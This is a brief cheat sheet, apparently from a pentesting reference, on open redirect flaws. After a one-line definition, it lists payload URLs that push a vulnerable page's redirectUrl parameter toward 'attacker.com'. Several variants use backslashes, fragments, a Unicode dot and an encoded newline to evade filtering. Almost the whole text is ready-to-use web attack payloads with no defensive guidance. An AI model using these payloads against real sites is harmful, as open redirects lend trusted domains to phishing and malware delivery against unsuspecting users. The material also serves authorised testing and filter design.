Open Redirect
Last modified: 2022-12-01
It accepts a user-controlled input that specifies a link to an external site and uses that link in a redirect.
Cheat Sheet
https://vulnerable.com/example.php?redirectUrl=https://attacker.com/
https://vulnerable.com/example.php?redirectUrl=https:\\attacker.com\
https://vulnerable.com/example.php?redirectUrl=https://attacker.com#.vulnerable.com/
<!-- "%E3%80%82" is "." -->
https://vulnerable.com/example.php?redirectUrl=https://attacker.com%E3%80%82%23.vulnerable.com/
<!-- "%0d" is newline -->
https://vulnerable.com/example.php?redirectUrl=/%0d/attacker.com/